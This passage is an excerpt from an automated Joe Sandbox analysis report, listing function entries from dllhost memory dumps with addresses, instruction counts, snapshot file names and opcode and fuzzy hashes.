                                      • Opcode ID: cac57ab153de9f93fb44435245dd1d6cb1ae9418e5de59cca5b080f33c03312e
                                      • Instruction ID: 4b6f95de41554d860bb60fe5207b9070583dde93c32e0e6ca809d00d4f8a9877
                                      • Opcode Fuzzy Hash: cac57ab153de9f93fb44435245dd1d6cb1ae9418e5de59cca5b080f33c03312e
                                      • Instruction Fuzzy Hash: C781B221B1CA6A4FEB98BE5884E62F973D1EF9A314F44407AD54EC3187DD2CBC859381
                                      Function 00007FFD346C3C5D Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @aW4
                                      • API String ID: 0-655038736
                                      • Opcode ID: 9163fc9bcd6f90a7a6690ef76e464a4c4b16ffa45c177b1ad2ecf2d92ff2274d
                                      • Instruction ID: 97dcd57a7074c279ade1b8385c2201a96175f7e8f84a2114b1e7fa97c68c6bde
                                      • Opcode Fuzzy Hash: 9163fc9bcd6f90a7a6690ef76e464a4c4b16ffa45c177b1ad2ecf2d92ff2274d
                                      • Instruction Fuzzy Hash: CB31B561F1CAAA4EFB98BE5881E93F927D1EFA6304F44457BD44EC2187DD2CAC859240
                                      Function 00007FFD346C37C9 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 1c44f275a59cd44e54f149f733f0345b3991127147d5ace36e100e85f39c5383
                                      • Instruction ID: 207bc0b2edf056dd54a6f54c86fc028fa45ae191fd65a13230feb99dd9800fb1
                                      • Opcode Fuzzy Hash: 1c44f275a59cd44e54f149f733f0345b3991127147d5ace36e100e85f39c5383
                                      • Instruction Fuzzy Hash: C9119371A0E6C84FDB56AF3448E90E87FB0EF97201B0941EBD149CB1A3D92D9C85C711
                                      Function 00007FFD346CAC59 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: c3ce21f32d2da4ee2058c78df52f173e52fb5f31e20cad960e7a5f3c8a90cddf
                                      • Instruction ID: 1fedcbcd00ff010b47938704d6976a210d516761a426bc1e3ebb6411f9371e27
                                      • Opcode Fuzzy Hash: c3ce21f32d2da4ee2058c78df52f173e52fb5f31e20cad960e7a5f3c8a90cddf
                                      • Instruction Fuzzy Hash: 1B01B561A0E7D10FE76AAA3548B91A47FA0DF93210B4A01EFC185CF1E3E91D9C89C352
                                      Function 00007FFD346C2539 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: dc3002ff939a5dd5e20e2c27253e770d42b68b735d0b2d9661baf8147c04caf9
                                      • Instruction ID: 79f55f1332781ba9b16eeb66819d9379cf51b30a1d7183cbad0231b026cf2882
                                      • Opcode Fuzzy Hash: dc3002ff939a5dd5e20e2c27253e770d42b68b735d0b2d9661baf8147c04caf9
                                      • Instruction Fuzzy Hash: A4F09B7190E3C04FCB56EB3884654957F60EF6721174A51EEC046CF1A7EA2DDC46C701
                                      Function 00007FFD346CAD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 71e884957e61d39dd6fa9796977376f6eb70f5ef1a6826252ab727de54d52237
                                      • Instruction ID: adb958f9c2a8e3f6e30cd150332c44388deebaffa210962d2b82fabf544f85ff
                                      • Opcode Fuzzy Hash: 71e884957e61d39dd6fa9796977376f6eb70f5ef1a6826252ab727de54d52237
                                      • Instruction Fuzzy Hash: 2FF0657190F7D54FC756AA3488694547FA0EF6720174A55EFC045CF1A3EA2DDC85CB01
                                      Function 00007FFD346C25C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: cdff153ba5f7b33aaa9b3f5c6c5f393541630c97f9d0e793489a0cff7fee89be
                                      • Instruction ID: 700aeaee1d091f0eca2ad6cea912dfcb6a953e20c4c67beb6189d7dbd28b2725
                                      • Opcode Fuzzy Hash: cdff153ba5f7b33aaa9b3f5c6c5f393541630c97f9d0e793489a0cff7fee89be
                                      • Instruction Fuzzy Hash: 1DE0E56194E7C04FCB46AB7488698457FA0AE67210B8A41EEC146CB1B3E62E8C49C701
                                      Function 00007FFD346908D0 Relevance: .2, Instructions: 168COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e6cf953e82ca2e1a256c86782814640ba91cf55ce3bb99fdda251409226c254
                                      • Instruction ID: e1b0662f5eb5ceb5b29cd5c08468d3d64e57452f9ae54cb68255f8a5d620ceba
                                      • Opcode Fuzzy Hash: 9e6cf953e82ca2e1a256c86782814640ba91cf55ce3bb99fdda251409226c254
                                      • Instruction Fuzzy Hash: 8A41543270CA254FD725EBACE4E99FA7BD0EF8632570405BBD189CB067DD14A88287C1
                                      Function 00007FFD3469090D Relevance: .1, Instructions: 146COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf123775e700c7dcd771536dccebe5cb6300c7878b945141f1011f5176a5e980
                                      • Instruction ID: d33df17ea8c8a01e53546903b0b19228911e1e2c2bea988ec111e11ac67e2215
                                      • Opcode Fuzzy Hash: bf123775e700c7dcd771536dccebe5cb6300c7878b945141f1011f5176a5e980
                                      • Instruction Fuzzy Hash: A7415B22B0D6A61EE715BBF8A4AA1F977D0DF56325B1404BFD14EC71A3DD1C68828284
                                      Function 00007FFD346C2CB6 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b17c38c2d4334401b6095b1769b165f73a2cb41e7d68fb82ebcc984a3759ddc
                                      • Instruction ID: d77d653522774858ab4380d2feb830753a54bca21f1b7cca2cc7f19cd5e8ba8a
                                      • Opcode Fuzzy Hash: 5b17c38c2d4334401b6095b1769b165f73a2cb41e7d68fb82ebcc984a3759ddc
                                      • Instruction Fuzzy Hash: 4E41B231F0C96A8FDB98FA48D4A57E873D2EB99314F04017AD44ED7296CE2C6C458780
                                      Function 00007FFD34690908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction ID: b4e8bf23edebf326d54642f1256673b116b9d61194b3aa82bee47c656b63fbb5
                                      • Opcode Fuzzy Hash: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction Fuzzy Hash: 6A21F83130CC184FE768EA0CE889DB973D1EB5A32130101BAE58EC7165E951EC8287C1
                                      Function 00007FFD3469116D Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 03906e686dad51fc4ce12356a81c799b589bbd8d94a8a6122940b71f08457933
                                      • Instruction ID: d7a995ad21857c516302076517a3a31f4e5b4492e2e7ffcc03c60ed9cde384ce
                                      • Opcode Fuzzy Hash: 03906e686dad51fc4ce12356a81c799b589bbd8d94a8a6122940b71f08457933
                                      • Instruction Fuzzy Hash: 1E41B331A0D6598FEF89EF68C8A99F97BF1EF5A300B1405BAD009D7193DA6DA841C740
                                      Function 00007FFD34690960 Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96fb05bf36a9d25da40aee094b1e3b9f6c960231a3c6faabef261d34fe1df4f9
                                      • Instruction ID: 9a2de3f9ca460b7e95335a7c21ad56afa5f113a58d197246ffcf8ccddeccc250
                                      • Opcode Fuzzy Hash: 96fb05bf36a9d25da40aee094b1e3b9f6c960231a3c6faabef261d34fe1df4f9
                                      • Instruction Fuzzy Hash: 2B312821B0DA661FF764BABCA4AA6FA77C1DF95325B1400BED54EC31D3CC5C78429284
                                      Function 00007FFD34690998 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e0ba31784426e398e4b9514b61c7b195319c2310712cb4020661b3aa8b00614a
                                      • Instruction ID: c571ef57478c88bd2975c261162b1c55271f17665c2001df59dfd6dd588d602b
                                      • Opcode Fuzzy Hash: e0ba31784426e398e4b9514b61c7b195319c2310712cb4020661b3aa8b00614a
                                      • Instruction Fuzzy Hash: 27312721B099690FEB98FA6C84AA6F977D2EF99315B1400BED44EC32D3DD6CAC419340
                                      Function 00007FFD34690C25 Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac417e48b4e1d587bb316f5a9bc6c8ba81ed3889f8f3d78380edfa0d0c04c005
                                      • Instruction ID: 27df2db4652f6e66acec5b69fb79198e8f93d8e938b75ab9c87029e09172e018
                                      • Opcode Fuzzy Hash: ac417e48b4e1d587bb316f5a9bc6c8ba81ed3889f8f3d78380edfa0d0c04c005
                                      • Instruction Fuzzy Hash: 08316976B0DA598FE711AFA898A11ED3BA0EF43324F1440B6D148DB1C3DA7C244AD781
                                      Function 00007FFD346C2601 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 683f417460cecc1bb9abbdefd5699b0c5902cc308eed611e805adb7834077256
                                      • Instruction ID: 35d455e5a480ca110e1d86e1fa26cf2c3dde2eecdce611b2a8177291eea06600
                                      • Opcode Fuzzy Hash: 683f417460cecc1bb9abbdefd5699b0c5902cc308eed611e805adb7834077256
                                      • Instruction Fuzzy Hash: 5E21C552F0DAA60FE784FA6948F52F866D1EF9A314F04007AD54EC31E3DC5D6C855351
                                      Function 00007FFD346C5494 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dbd1adc4853b9066d0e5cd0ea6fd13d036c8548dc6bc8ffc961eab8a2c42e932
                                      • Instruction ID: 9a50bcf39fa50b9b567623889d7e5941644044bc035e63765f8fee6026df9629
                                      • Opcode Fuzzy Hash: dbd1adc4853b9066d0e5cd0ea6fd13d036c8548dc6bc8ffc961eab8a2c42e932
                                      • Instruction Fuzzy Hash: 6E214C71F19A294FE798EB188CA56E9B3E2FFA9304F5441B6D04DD3192DD386C818A40
                                      Function 00007FFD346969E3 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27c8a126bf9a028b9362d32af638fd155ce25371756b52d6e60495ca39610ed8
                                      • Instruction ID: 49fb24af522fb8e2d7cd285a9baebaa9afcc3fef2481644bdb97dc5643bae680
                                      • Opcode Fuzzy Hash: 27c8a126bf9a028b9362d32af638fd155ce25371756b52d6e60495ca39610ed8
                                      • Instruction Fuzzy Hash: DF212C30E186698FDB65DF04C4A4BE9B3E1FB59314F1085EAC50EE3291CA79AE81CB40
                                      Function 00007FFD34690C38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 02c50d47cb02605bc94dfeb53cbab09840027d48ec65975aa75282f97923a5f3
                                      • Instruction ID: 2525317c77ab5de0c386867e2e3942c844009960e1dc2e6665701f10f1c1f6f3
                                      • Opcode Fuzzy Hash: 02c50d47cb02605bc94dfeb53cbab09840027d48ec65975aa75282f97923a5f3
                                      • Instruction Fuzzy Hash: 64110276B0DB598FE702DF6888A10ED7BB0EF43310F1444B7C144DB292D97C25469781
                                      Function 00007FFD34690C40 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f42fc00a0715bc61d77b22d58f22ad18b8ce2ec0e576cd875ad49b37009d59f9
                                      • Instruction ID: 9dd0e4345ddfff0d78ffcc9c283e2c0f9286926005443b1177b8b96c1bfaef04
                                      • Opcode Fuzzy Hash: f42fc00a0715bc61d77b22d58f22ad18b8ce2ec0e576cd875ad49b37009d59f9
                                      • Instruction Fuzzy Hash: 2D11AD76A0EB998FEB02DF6888A10ED7BB0EF53310F1544B6C144DB292DA7C26499781
                                      Function 00007FFD346CDF06 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38b87ea51f2c56f82a8d5aca3330e485e2b3bcac1a27534e5d928bff249d4ef4
                                      • Instruction ID: 1e00b52051d22c68876a01b75ca5baf25f9604011fd9f152614bd01bc3f1af53
                                      • Opcode Fuzzy Hash: 38b87ea51f2c56f82a8d5aca3330e485e2b3bcac1a27534e5d928bff249d4ef4
                                      • Instruction Fuzzy Hash: 7F017C32F0852A8AEB94EA6885A53FD73E2EF95311F044176D11DD3286DE2DAD819BC0
                                      Function 00007FFD34690C48 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65e49202b3cf8e39388cae810a529a44912298b23f0f198ba9e513bfcdde4f37
                                      • Instruction ID: f294318c0ac0c85e283866d5aea4cc729a8ade9150fd567d596a8873768e2915
                                      • Opcode Fuzzy Hash: 65e49202b3cf8e39388cae810a529a44912298b23f0f198ba9e513bfcdde4f37
                                      • Instruction Fuzzy Hash: 04018C76A0E7898FEB12DF6488A00ED7BB0EF43310F1541F6C144DB292DA786A459781
                                      Function 00007FFD346A4D25 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346a0000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                      • Instruction ID: ff8642a19e7426fad39dd8a6404f0934a673f959a6bad7603285e5a2056c97a7
                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                      • Instruction Fuzzy Hash: B4F03060B09D2B8FFA95AE18ACF16F97291FB96311F1041B5D50EC21C6EF6CE805A684
                                      Function 00007FFD346C8119 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a5a0838a6e9bcad5c476d78baade29a8781ad7157ba34f732dd51812809b3e2
                                      • Instruction ID: 706ba1b8d435947c2200a3cf37b6b6efe97f008a48382032edd008e848d317da
                                      • Opcode Fuzzy Hash: 8a5a0838a6e9bcad5c476d78baade29a8781ad7157ba34f732dd51812809b3e2
                                      • Instruction Fuzzy Hash: CDE09262A4E3C14FC71B9A2488B88903F60DF2720574A50FBC149CF5A3D91E9C09D701
                                      Function 00007FFD346A5B10 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346a0000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                      • Instruction ID: 1072f8c4aa836f86fa5ac26da6a282d61cb515e4c0300f1ff2c850a6052d66c8
                                      • Opcode Fuzzy Hash: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                      • Instruction Fuzzy Hash: 02D0A530B6090D474B4CB53D4454470F3D1F75A5067D4527CD40BC3281DD15DCC6C740
                                      Function 00007FFD346CAC70 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFD346CAD40 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFD346C89A9 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8498544355ad932467259601a785609382f03f77ce112762130e3c40fbd896c
                                      • Instruction ID: 4178b6ef4cfbe7e170c2fe6185dcdaa7c34edfa860ffad6c18479efdbb3749e8
                                      • Opcode Fuzzy Hash: e8498544355ad932467259601a785609382f03f77ce112762130e3c40fbd896c
                                      • Instruction Fuzzy Hash: 78E01A7154E7C04FCB16EB7488698547FB0EE6721178B41EEC146CF1B3E62E8849C711
                                      Function 00007FFD346A4597 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346a0000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f65097b4c0d3ea82e5f5c5e47fd1d304130cf20107e9821f2888204894fea80
                                      • Instruction ID: a6bbaca167e469757cc414bf5b5adee137060f655625d7df89b77828cf4a9b33
                                      • Opcode Fuzzy Hash: 0f65097b4c0d3ea82e5f5c5e47fd1d304130cf20107e9821f2888204894fea80
                                      • Instruction Fuzzy Hash: 11E0B671E1992A8BE7A0DF98D8A82BD66E1EF95614F80013AD049E7295DE282C025650
                                      Function 00007FFD346C25E0 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFD346C7700 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                      • Instruction ID: be60bb61b23a9739b54f0f41764dd9212fb0e2443a1ac7c4c437dabb5349ee8a
                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                      • Instruction Fuzzy Hash: A5D02230B60C000F870CBA38889887033D0EB6A207B8000A8D00AC72B1D92ADC88C740
                                      Function 00007FFD34690B9A Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: fab944e319c1feb3e92c68a221436a8fdff2297cc52bc2b3e77900035b5644f2
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction Fuzzy Hash: 37D012345668098FC650EB28D9D5894BA90FB0A214B8901D0D40CC71A1D39A9894C701
                                      Function 00007FFD346906A5 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
